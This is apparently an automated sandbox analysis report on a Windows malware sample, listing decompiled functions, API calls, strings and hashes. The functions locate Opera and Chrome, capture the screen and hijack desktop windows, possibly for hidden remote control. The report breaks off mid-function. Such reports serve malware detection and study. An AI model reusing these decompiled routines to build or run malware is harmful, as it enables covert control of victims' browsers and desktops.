SetWindowOrgEx.GDI32 ref: 00C836C1
SetBkColor.GDI32 ref: 00C836CD
ExtTextOutA.GDI32 ref: 00C836FA
SelectObject.GDI32 ref: 00C8370A
SetBkMode.GDI32 ref: 00C8371B
CreateRectRgn.GDI32 ref: 00C83738
SelectClipRgn.GDI32 ref: 00C8374C
SetTextColor.GDI32 ref: 00C83758
DrawTextW.USER32 ref: 00C8377E
DeleteObject.GDI32 ref: 00C8378C
BitBlt.GDI32 ref: 00C837C3
SelectObject.GDI32 ref: 00C837E6
SelectObject.GDI32 ref: 00C837F7
DeleteObject.GDI32 ref: 00C83805
DeleteDC.GDI32 ref: 00C83813
EndPaint.USER32 ref: 00C83825

Strings

%, xrefs: 00C8376D
, xrefs: 00C837A6

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ColorObject$Select$CreateDeleteText$ClipCompatiblePaintRect$BeginBitmapClientDrawModeWindow
String ID: $%
API String ID: 1692378535-2111875603
Opcode ID: c14e002040add2d31ee41b0c70034e36200d1b0139c05a8f775b4a1b7ba1fd55
Instruction ID: cd271a62573cf0c023079b8fe6e8d010c8d2eac450d273367752e6661590715e
Opcode Fuzzy Hash: c14e002040add2d31ee41b0c70034e36200d1b0139c05a8f775b4a1b7ba1fd55
Instruction Fuzzy Hash: B6614A76701A518AFB14DF66E848B5D73A1F788F89F949225DE0A13B18DF38C50DC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C77530, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 166
stringmemorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00C77530(void* __edx, long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				void* __r14;
				long _t38;
				long _t39;
				void* _t40;
				long _t41;
				long _t45;
				long _t57;
				void* _t58;
				long long _t70;
				long long _t71;
				void* _t92;
				void* _t100;
				char* _t105;
				void* _t106;
				signed long long _t110;
				long long _t111;
				long long _t113;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t119;
				char* _t122;
				void* _t123;
				long long _t125;
				long long _t127;
				long long _t130;
				signed short* _t133;

				_t123 = __r9;
				_t119 = __r8;
				_t111 = __rsi;
				_t71 = __rbx;
				_t70 = __rax;
				 *((long long*)(_t116 + 8)) = __rbx;
				 *((long long*)(_t116 + 0x10)) = _t113;
				 *((long long*)(_t116 + 0x18)) = __rsi;
				_push(_t106);
				_push(_t125);
				_push(_t127);
				_t117 = _t116 - 0x160;
				_t45 = 0;
				_t133 = __rdx;
				_t57 = 0;
				r12d = 0;
				r13d = 0;
				_t114 = __rcx;
				E00C7A500(__rbx, __rcx, L"OPR", _t106, __rsi);
				_t130 = _t70;
				if(_t70 != 0) {
					lstrcpyA();
					lstrcatA(??, ??);
					_t100 =  *((intOrPtr*)(_t114 + 0x38)) + 0x198;
					lstrcatA(??, ??);
					r8d = 0;
					_t123 = _t117 + 0x20;
					CreateEventA(??, ??, ??, ??);
					_t111 = _t70;
					if(_t70 != 0 && GetLastError() == 0xb7 && WaitForSingleObject() != 0) {
						CloseHandle();
						_t111 = _t71;
					}
					if(_t111 != 0) {
						if(E00C77408(_t70, _t71, _t114) == 0) {
							E00C76F88(_t70, _t71, _t114, _t106, _t111, _t119, _t130);
							while((0x0000fffd & ( *_t133 & 0x0000ffff) - 0x00000020) == 0) {
								_t133 =  &(_t133[1]);
							}
							_t12 = _t100 + 0x5c; // 0x5c
							r8d = _t12;
							__imp__StrRChrW();
							_t110 = _t70 - _t133 >> 1;
							_t58 = _t57 + 1;
							r8d = _t58;
							_t122 = _t119 + _t119;
							HeapAlloc(??, ??, ??);
							_t125 = _t70;
							if(_t70 != 0) {
								r8d = _t58;
								lstrcpynW(??, ??, ??);
								E00C7A8A0(_t70, _t71, _t114, _t133);
								_t127 = _t70;
								_t38 = E00C7FD2C(_t70, _t71, _t125, _t130, _t111);
								_t57 = _t38;
								if(_t38 == 0) {
									r8d = 0;
									_t39 = E00C771A0(_t70, _t71, _t114, L"APPDATA", _t110, _t111, _t122, _t123);
									_t57 = _t39;
									if(_t39 == 0) {
										_t40 = E00C6ADD8();
										_t92 = _t114;
										if(_t40 > 5) {
											r8d = 0;
											_t105 = L"LOCALAPPDATA";
										} else {
											_t122 = L"\\Local Settings\\Application Data";
											_t105 = L"USERPROFILE";
										}
										_t41 = E00C771A0(_t70, _t71, _t92, _t105, _t110, _t111, _t122, _t123);
										goto L20;
									}
								}
							} else {
								_t13 = _t70 + 8; // 0x8
								_t57 = _t13;
							}
						}
					} else {
						_t57 = 0x5b4;
					}
				} else {
					_t41 = GetLastError();
					L20:
					_t57 = _t41;
				}
				E00C7A914(_t127, _t123);
				if(_t57 == 0 && _t130 != 0) {
					lstrcatW();
					E00C80890(_t71, _t130, L"\\opera.exe", _t111, _t114);
				}
				if(_t111 != 0) {
					SetEvent();
					CloseHandle(??);
				}
				if(_t130 != 0) {
					HeapFree();
				}
				if(_t125 != 0) {
					HeapFree();
				}
				if(_t57 == 0) {
					_t45 = 1;
				} else {
					SetLastError();
				}
				return _t45;
			}

0x00c77530
0x00c77530
0x00c77530
0x00c77530
0x00c77530
0x00c77530
0x00c77535
0x00c7753a
0x00c7753f
0x00c77540
0x00c77542
0x00c77548
0x00c7754f
0x00c77551
0x00c7755b
0x00c7755d
0x00c77560
0x00c77565
0x00c77568
0x00c7756d
0x00c77573
0x00c7758c
0x00c7759e
0x00c775ad
0x00c775b4
0x00c775ba
0x00c775bd
0x00c775c8
0x00c775ce
0x00c775d4
0x00c775f8
0x00c775fe
0x00c775fe
0x00c77604
0x00c7761a
0x00c77623
0x00c77628
0x00c7763a
0x00c7763a
0x00c77645
0x00c77645
0x00c77649
0x00c7765e
0x00c77661
0x00c77663
0x00c77666
0x00c77669
0x00c7766f
0x00c77675
0x00c7767c
0x00c77685
0x00c7768e
0x00c77699
0x00c7769c
0x00c776a1
0x00c776a5
0x00c776a7
0x00c776b4
0x00c776b9
0x00c776bd
0x00c776bf
0x00c776c4
0x00c776ca
0x00c776dc
0x00c776df
0x00c776cc
0x00c776cc
0x00c776d3
0x00c776d3
0x00c776e6
0x00000000
0x00c776e6
0x00c776bd
0x00c77677
0x00c77677
0x00c77677
0x00c77677
0x00c77675
0x00c77606
0x00c77606
0x00c77606
0x00c77575
0x00c77575
0x00c776eb
0x00c776eb
0x00c776eb
0x00c776f0
0x00c776f7
0x00c77708
0x00c77713
0x00c77713
0x00c7771b
0x00c77720
0x00c77729
0x00c77729
0x00c77732
0x00c77740
0x00c77740
0x00c77749
0x00c77757
0x00c77757
0x00c7775f
0x00c7776b
0x00c77761
0x00c77763
0x00c77763
0x00c77792

APIs

Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661

GetLastError.KERNEL32 ref: 00C77575
lstrcpyA.KERNEL32 ref: 00C7758C
lstrcatA.KERNEL32 ref: 00C7759E
lstrcatA.KERNEL32 ref: 00C775B4
CreateEventA.KERNEL32 ref: 00C775C8
GetLastError.KERNEL32 ref: 00C775D6
WaitForSingleObject.KERNEL32 ref: 00C775EB
CloseHandle.KERNEL32 ref: 00C775F8
lstrcatW.KERNEL32 ref: 00C77708
SetEvent.KERNEL32 ref: 00C77720
CloseHandle.KERNEL32 ref: 00C77729
HeapFree.KERNEL32 ref: 00C77740
HeapFree.KERNEL32 ref: 00C77757
SetLastError.KERNEL32 ref: 00C77763

Strings

\Local Settings\Application Data, xrefs: 00C776CC
LOCALAPPDATA, xrefs: 00C776DF
OPR, xrefs: 00C77554
\opera.exe, xrefs: 00C776FE
APPDATA, xrefs: 00C776AA
USERPROFILE, xrefs: 00C776D3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$FreeHeaplstrcat$CloseEventHandle$CreateObjectPathSingleTempWaitlstrcpy
String ID: APPDATA$LOCALAPPDATA$OPR$USERPROFILE$\Local Settings\Application Data$\opera.exe
API String ID: 1059675241-2210929480
Opcode ID: 13db4fb79f4a3c3d53eaede1588cd29ad5dab95579c290c721b79de04102e414
Instruction ID: 7532f7a6802c81831adf4a1260fc6a56a0861f2de0acd64dd766655fc0c04c02
Opcode Fuzzy Hash: 13db4fb79f4a3c3d53eaede1588cd29ad5dab95579c290c721b79de04102e414
Instruction Fuzzy Hash: 9E51B165304F0582FB25AB26E854B6A6361BB85FD4F94C621ED1E47B28EF3CC94AC344

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C47C, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 253windowtimeCOMMON

Download Yara Rule

APIs

WindowFromPoint.USER32(?,?,?,?,?,?,?,?,?,00000000,?,00008001,00000000,00C7998F), ref: 00C7C4B5
SendMessageTimeoutA.USER32 ref: 00C7C4F7
RealChildWindowFromPoint.USER32(?,?,?,?,?,?,?,?,?,00000000,?,00008001,00000000,00C7998F), ref: 00C7C585
SendMessageTimeoutA.USER32 ref: 00C7C5C2
GetWindowLongPtrA.USER32 ref: 00C7C5F1
SetWindowLongPtrA.USER32 ref: 00C7C607

Part of subcall function 00C7C47C: GetWindowLongPtrA.USER32 ref: 00C7C63F
Part of subcall function 00C7C47C: SetWindowLongPtrA.USER32 ref: 00C7C652

ScreenToClient.USER32 ref: 00C7C67A
SendMessageTimeoutA.USER32 ref: 00C7C6C0
GetAncestor.USER32 ref: 00C7C6EE
GetWindowLongPtrA.USER32 ref: 00C7C734
GetWindowInfo.USER32 ref: 00C7C754
PtInRect.USER32 ref: 00C7C77C
GetWindowLongPtrA.USER32 ref: 00C7C7AC
SendMessageTimeoutA.USER32 ref: 00C7C7F4
MapWindowPoints.USER32 ref: 00C7C825
MapWindowPoints.USER32 ref: 00C7C84C
RealChildWindowFromPoint.USER32 ref: 00C7C859
SendMessageTimeoutA.USER32 ref: 00C7C8B3

Strings

d, xrefs: 00C7C8A3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Long$MessageSendTimeout$FromPoint$ChildPointsReal$AncestorClientInfoRectScreen
String ID: d
API String ID: 4017282500-2564639436
Opcode ID: 8507a3016438b6ddf8f0eeac2c1db0038eeebe7a5efc903a5fd3631a5ab62723
Instruction ID: 062b307d5504b20cdf34b3051d092bef0b8b4679640526f02f60c9f308ffa1d6
Opcode Fuzzy Hash: 8507a3016438b6ddf8f0eeac2c1db0038eeebe7a5efc903a5fd3631a5ab62723
Instruction Fuzzy Hash: 59B16E32311B41CAEB208F65E4847AD6371F748B98F40822AEE6E47F99DF38D509C715

Uniqueness

Uniqueness Score: -1.00%

Function 00C771A0, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00C771D4
GetEnvironmentVariableW.KERNEL32 ref: 00C771E4
GetLastError.KERNEL32 ref: 00C771F1
HeapAlloc.KERNEL32 ref: 00C77214
GetEnvironmentVariableW.KERNEL32 ref: 00C77233
GetLastError.KERNEL32 ref: 00C7723D
HeapFree.KERNEL32 ref: 00C77377

Strings

opera.exe, xrefs: 00C77348
\Opera, xrefs: 00C7725B, 00C772A4
_OPR, xrefs: 00C77335

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentErrorHeapLastVariable$AllocFreelstrlen
String ID: \Opera$_OPR$opera.exe
API String ID: 2673498452-2944665979
Opcode ID: b89749c707e4ee9a4dca77185ae99192fa902325a018c9f7abfb8c721f157e5f
Instruction ID: 886371d13a67a4ebcc5cf150df6737541a10aa16f91d92ae9b7f0c9c6a2dea38
Opcode Fuzzy Hash: b89749c707e4ee9a4dca77185ae99192fa902325a018c9f7abfb8c721f157e5f
Instruction Fuzzy Hash: 22517876304B5582FB14DF22E844B5863A1BB89FE4F88C315ED2A43B64EF38C64A8704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E7C0, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 117
windowCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C7E7C0(signed int __ecx, void* __edx, long long __rbx, long long __rsi, long long __rbp, void* __r9) {
				void* _v40;
				long long _v80;
				intOrPtr _v88;
				long _t38;
				long long _t64;
				long long _t65;
				long long _t90;
				long long _t93;
				long long _t95;
				long long _t97;
				struct HWND__* _t106;
				int _t109;
				int _t111;
				void* _t114;

				_t65 = __rbx;
				_t64 = _t97;
				 *((long long*)(_t64 + 8)) = __rbx;
				 *((long long*)(_t64 + 0x10)) = __rbp;
				 *((long long*)(_t64 + 0x18)) = __rsi;
				_t38 = 0;
				r14d = __ecx;
				 *((intOrPtr*)(_t64 - 0x58)) = 0;
				_t6 = _t65 + 0x20; // 0x20
				r8d = _t6;
				memset(_t114, _t111, _t109);
				GetDC(_t106);
				_t95 = _t64;
				if(_t64 == 0) {
					L10:
					return _t38;
				}
				CreateCompatibleDC();
				_t90 = _t64;
				if(_t64 == 0) {
					L9:
					ReleaseDC();
					goto L10;
				}
				r8d = r14d;
				CreateCompatibleBitmap(??, ??, ??);
				_t93 = _t64;
				if(_t64 == 0) {
					L8:
					DeleteDC();
					goto L9;
				}
				SelectObject();
				E00C7B940(_t64, __rbx, _t90, "Progman", _t93, _t95, "Program Manager");
				if(_t64 != 0) {
					r8d = 0;
					E00C7B940(_t64, _t65, _t64, "SHELLDLL_DefView", _t93, _t95, "Program Manager");
					if(_t64 != 0) {
						E00C7B940(_t64, _t65, _t64, "SysListView32", _t93, _t95, "FolderView");
						if(_t64 != 0) {
							r8d = 0xc00000;
							SendMessageA(??, ??, ??, ??);
							_t7 = _t65 - 0x10; // -16
							r13d = _t7;
							r8d = GetWindowLongA(??, ??) | 0x10000000;
							SetWindowLongA(??, ??, ??);
							r8d = GetWindowLongA(??, ??) | 0x10000000;
							SetWindowLongA(??, ??, ??);
							r8d = GetWindowLongA(??, ??) | 0x10000000;
							SetWindowLongA(??, ??, ??);
							_v88 = 1;
							r8d = 0;
							_v80 = _t93;
							_t38 = SendMessageA(??, ??, ??, ??);
						}
					}
				}
				DeleteObject();
				goto L8;
			}

0x00c7e7c0
0x00c7e7c0
0x00c7e7c3
0x00c7e7c7
0x00c7e7cb
0x00c7e7dc
0x00c7e7e0
0x00c7e7e3
0x00c7e7ec
0x00c7e7ec
0x00c7e7f0
0x00c7e7f7
0x00c7e7fd
0x00c7e803
0x00c7e962
0x00c7e981
0x00c7e981
0x00c7e80c
0x00c7e812
0x00c7e818
0x00c7e957
0x00c7e95c
0x00000000
0x00c7e95c
0x00c7e81e
0x00c7e826
0x00c7e82c
0x00c7e832
0x00c7e94e
0x00c7e951
0x00000000
0x00c7e951
0x00c7e83e
0x00c7e854
0x00c7e85f
0x00c7e865
0x00c7e872
0x00c7e87d
0x00c7e894
0x00c7e89f
0x00c7e8b1
0x00c7e8ba
0x00c7e8c0
0x00c7e8c0
0x00c7e8dd
0x00c7e8e0
0x00c7e8fa
0x00c7e8fd
0x00c7e917
0x00c7e91a
0x00c7e925
0x00c7e92d
0x00c7e930
0x00c7e943
0x00c7e943
0x00c7e89f
0x00c7e87d
0x00c7e948
0x00000000

APIs

memset.NTDLL(?,?,?,?,?,?,?,?,?,00C68CF2), ref: 00C7E7F0
GetDC.USER32 ref: 00C7E7F7
CreateCompatibleDC.GDI32 ref: 00C7E80C
CreateCompatibleBitmap.GDI32 ref: 00C7E826
SelectObject.GDI32(?,?,?,?,?,?,?,?,?,00C68CF2), ref: 00C7E83E

Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986

DeleteObject.GDI32 ref: 00C7E948

Part of subcall function 00C7B940: Sleep.KERNEL32(?,?,?,00C68A63,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7B975

SendMessageA.USER32 ref: 00C7E8BA
GetWindowLongA.USER32 ref: 00C7E8CA
SetWindowLongA.USER32 ref: 00C7E8E0
GetWindowLongA.USER32 ref: 00C7E8EC
SetWindowLongA.USER32 ref: 00C7E8FD
GetWindowLongA.USER32 ref: 00C7E909
SetWindowLongA.USER32 ref: 00C7E91A
SendMessageA.USER32 ref: 00C7E93D
DeleteDC.GDI32 ref: 00C7E951
ReleaseDC.USER32 ref: 00C7E95C

Strings

SHELLDLL_DefView, xrefs: 00C7E868
Program Manager, xrefs: 00C7E844
FolderView, xrefs: 00C7E883
SysListView32, xrefs: 00C7E88D
Progman, xrefs: 00C7E84D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Long$CompatibleCreateDeleteMessageObjectSend$BitmapFindReleaseSelectSleepmemset
String ID: FolderView$Progman$Program Manager$SHELLDLL_DefView$SysListView32
API String ID: 1800107338-1763248648
Opcode ID: 53a34a5daeb79ae94d50f395825139e51be9b516ac447535f6e0b4f6bbccd857
Instruction ID: edb4a067f89926029561c3a4c82b716b53b62a78bd49959e6454e2a31d1d9a2c
Opcode Fuzzy Hash: 53a34a5daeb79ae94d50f395825139e51be9b516ac447535f6e0b4f6bbccd857
Instruction Fuzzy Hash: BA41A526311B4082FF24EB26A818B6A63A1FB49FD4F84C6259E2E47B54DF3CC90DC304

Uniqueness

Uniqueness Score: -1.00%

Function 00C79F90, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 120stringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C79FD4
lstrcatA.KERNEL32 ref: 00C79FE5
lstrcatA.KERNEL32 ref: 00C79FFA
CreateEventA.KERNEL32 ref: 00C7A00C
GetLastError.KERNEL32 ref: 00C7A01E
WaitForSingleObject.KERNEL32 ref: 00C7A033
CloseHandle.KERNEL32 ref: 00C7A040
lstrlenW.KERNEL32 ref: 00C7A05D
WideCharToMultiByte.KERNEL32 ref: 00C7A0B8
lstrcpyA.KERNEL32 ref: 00C7A0C8
lstrcatA.KERNEL32 ref: 00C7A0DC
lstrcatA.KERNEL32 ref: 00C7A0F4
OpenEventA.KERNEL32 ref: 00C7A106
CloseHandle.KERNEL32 ref: 00C7A114
SetEvent.KERNEL32 ref: 00C7A146
CloseHandle.KERNEL32 ref: 00C7A14F

Strings

LOCALAPPDATA, xrefs: 00C79F90
chrome.exe, xrefs: 00C79F92

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CloseEventHandle$lstrcpy$ByteCharCreateErrorLastMultiObjectOpenSingleWaitWidelstrlen
String ID: LOCALAPPDATA$chrome.exe
API String ID: 2873254647-1937607147
Opcode ID: 33e55e4f1397d8173686ae51d366145c42bf2077f7b06a87ce29f12424db1e12
Instruction ID: decace0a8568cdfff8618caa35e6e6e9be458a0d6688ac8740ccbebd79357885
Opcode Fuzzy Hash: 33e55e4f1397d8173686ae51d366145c42bf2077f7b06a87ce29f12424db1e12
Instruction Fuzzy Hash: 7C515232201A81D5EB249F26EC54BAD3361FB85BA4F848615DE2E47BA4DF38C64DC345

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DBCC, Relevance: 30.1, APIs: 20, Instructions: 116windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00C7DBF2

Part of subcall function 00C7EAA8: CreateDIBSection.GDI32 ref: 00C7EAC7

SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC0E
DeleteObject.GDI32 ref: 00C7DC1B
DeleteDC.GDI32 ref: 00C7DC28
CreateCompatibleDC.GDI32 ref: 00C7DC31
GetLastError.KERNEL32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC43
SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC7C
SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC9C
DeleteObject.GDI32 ref: 00C7DCA9
DeleteDC.GDI32 ref: 00C7DCB6
CreateCompatibleDC.GDI32 ref: 00C7DCBF
CreateCompatibleBitmap.GDI32 ref: 00C7DCE5
SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD05
SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD2D
DeleteObject.GDI32 ref: 00C7DD47
DeleteDC.GDI32 ref: 00C7DD61
SelectObject.GDI32 ref: 00C7DD94
DeleteObject.GDI32 ref: 00C7DDAE
DeleteDC.GDI32 ref: 00C7DDC8
ReleaseDC.USER32 ref: 00C7DDE0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Object$Delete$Select$Create$Compatible$BitmapErrorLastReleaseSection
String ID:
API String ID: 3938452263-0
Opcode ID: bd3c2afa9b99237efc5eeef9aa2d561f0da5e196e2ceaca26c01c7e756f59dfd
Instruction ID: 505b62d31422aef80a28908d28af62d529573abac567a7d8d4f440a0149fd058
Opcode Fuzzy Hash: bd3c2afa9b99237efc5eeef9aa2d561f0da5e196e2ceaca26c01c7e756f59dfd
Instruction Fuzzy Hash: 6251E566202B8085FB55DF21E4587A93372FB84F88F588635DE5E4B718DF39C4A9C324

Uniqueness

Uniqueness Score: -1.00%

Function 00C81E14, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 216
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00C81E14(void* __ecx, void* __edx, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, long long __rbp, signed int __r8, void* __r9) {
				void* _v24;
				void* _v84;
				intOrPtr _v88;
				void* _t40;
				void* _t41;
				signed int _t42;
				signed char _t43;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				signed int _t87;
				signed int _t98;
				signed int _t110;
				signed int _t116;
				signed int _t119;
				signed int _t123;
				void* _t133;

				_t127 = __r9;
				_t126 = __r8;
				_t121 = __rbp;
				_t63 = __rbx;
				_t62 = _t123;
				 *((long long*)(_t62 + 8)) = __rbx;
				 *((long long*)(_t62 + 0x10)) = __rbp;
				 *(_t62 + 0x18) = __rsi;
				 *((long long*)(_t62 + 0x20)) = __rdi;
				_t58 = r9d;
				_t119 = __r8;
				_t41 = E00C7FA04(_t40, __rbx, 0xc82aa4, __rcx, __r8, _t133);
				_t116 = _t62;
				r14d = 1;
				if(_t62 == 0) {
					L58:
					return _t41;
				}
				_t41 = WaitForSingleObject();
				if(_t41 == 0x102) {
					__eflags = _t58;
					if(_t58 != 0) {
						goto L58;
					}
					__eflags = __r8;
					if(__r8 == 0) {
						goto L58;
					}
					_t6 = _t116 + 0x88; // 0x88
					_t135 = _t6;
					_t41 = E00C7BB64(_t62, _t63, _t6, __r8, __r9);
					asm("bt eax, 0x9");
					if(__eflags < 0) {
						goto L58;
					}
					_t50 = __edx - 3;
					__eflags = _t50;
					if(_t50 == 0) {
						_t42 = E00C82150(_t63, _t116, _t119);
						__eflags = _t42;
						if(_t42 != 0) {
							L55:
							_t34 = _t116 + 0x1a8; // 0x1a8
							_t65 = _t34;
							EnterCriticalSection(??);
							_t41 = E00C822AC(0, _t62, _t34, _t116, _t119, _t121, _t126, _t127);
							L56:
							L57:
							LeaveCriticalSection();
							goto L58;
						}
						_t43 = E00C7BB64(_t62, _t63, _t135, _t119, __r9);
						__eflags = _t43 & 0x00000020;
						if((_t43 & 0x00000020) != 0) {
							goto L55;
						}
						r8d = r14d;
						_t41 = E00C82424(0, _t62, _t63, _t116, _t119, _t119, __rbp, _t126, __r9);
						E00C7F4BC();
						L54:
						__eflags = r14d;
						if(r14d == 0) {
							goto L58;
						}
						goto L55;
					}
					_t51 = _t50 - 0x7ffd;
					__eflags = _t51;
					if(_t51 == 0) {
						_t41 = E00C82150(_t63, _t116, _t119);
						__eflags = _t41;
						if(_t41 != 0) {
							goto L58;
						}
						_t31 = _t116 + 0x1a8; // 0x1a8
						_t65 = _t31;
						EnterCriticalSection(??);
						_t41 = E00C81B4C(_t31, _t116, _t119, _t116, _t119, __rbp, _t126, __r9);
						goto L56;
					}
					_t52 = _t51 - r14d;
					__eflags = _t52;
					if(_t52 == 0) {
						_t30 = _t116 + 0x1a8; // 0x1a8
						EnterCriticalSection(??);
						r8d = r14d;
						_t41 = E00C81C90(__ecx, _t30, _t116, _t116, _t119, __rbp, __r9);
						r14d = _t41;
						L48:
						LeaveCriticalSection();
						goto L54;
					}
					_t53 = _t52 - r14d;
					__eflags = _t53;
					if(_t53 == 0) {
						_t41 = IsWindowVisible();
						__eflags = _t41;
						if(_t41 != 0) {
							goto L58;
						}
						_t22 = _t116 + 0x1a8; // 0x1a8
						_t65 = _t22;
						EnterCriticalSection(??);
						_t62 =  *((intOrPtr*)(_t116 + 0x1d0));
						while(1) {
							__eflags = _t62;
							if(_t62 == 0) {
								break;
							}
							__eflags =  *_t62 - _t119;
							if( *_t62 == _t119) {
								break;
							}
							_t62 =  *((intOrPtr*)(_t62 + 0x38));
						}
						__eflags = _t62;
						if(_t62 == 0) {
							goto L56;
						}
						_t59 =  *(_t62 + 0x18);
						r12d =  *(_t62 + 0x2c);
						r15d =  *(_t62 + 0x14);
						__eflags = _t59;
						if(_t59 != 0) {
							_t28 = _t62 + 0x18;
							 *_t28 =  *(_t62 + 0x18) & 0x00000000;
							__eflags =  *_t28;
						}
						LeaveCriticalSection();
						__eflags = _t59;
						if(_t59 != 0) {
							__eflags = r12d;
							if(r12d == 0) {
								goto L55;
							}
							_t110 = _t119;
							_t87 = _t116;
							__eflags = r15d;
							if(__eflags != 0) {
								L34:
								E00C7C170(__eflags, _t62, _t65, _t87, _t110, _t119, _t121, _t126, _t127);
								goto L55;
							}
							r8d = r14d;
							E00C82424(0, _t62, _t65, _t87, _t110, _t119, _t121, _t126, _t127);
						}
						goto L55;
					}
					_t54 = _t53 - r14d;
					__eflags = _t54;
					if(_t54 == 0) {
						_t41 = IsWindowVisible();
						__eflags = _t41;
						if(_t41 == 0) {
							goto L58;
						}
						_t13 = _t116 + 0x1a8; // 0x1a8
						_t121 = _t13;
						EnterCriticalSection(??);
						_t65 =  *((intOrPtr*)(_t116 + 0x1d0));
						while(1) {
							__eflags = _t65;
							if(_t65 == 0) {
								break;
							}
							__eflags =  *_t65 - _t119;
							if( *_t65 == _t119) {
								break;
							}
							_t65 =  *((intOrPtr*)(_t65 + 0x38));
						}
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags =  *(_t65 + 0x18);
